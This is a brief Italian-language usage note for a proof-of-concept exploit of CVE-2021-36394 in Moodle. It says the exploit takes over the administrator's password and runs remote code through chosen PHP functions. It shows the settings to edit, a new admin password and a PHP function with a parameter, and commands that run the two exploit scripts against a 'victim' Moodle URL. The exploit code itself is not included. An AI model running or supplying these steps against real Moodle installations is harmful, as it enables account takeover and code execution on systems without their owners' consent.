
Proof-of-concept exploit per CVE-2021-36394 in Moodle, che consente l'acquisizione della password dell'amministratore e l'esecuzione remota di codice tramite funzioni PHP personalizzate.
Codice personalizzato
$newpassword = "Accounttakedover123";
Quindi esegui:
$ CVE2021-36394.php http://victim/path_to_moodle
Codice personalizzato
$function = "header"; $param = "Hacked: by0d0ff9";
Quindi esegui:
$ CVE2021-36394_RCE.php http://victim/path_to_moodle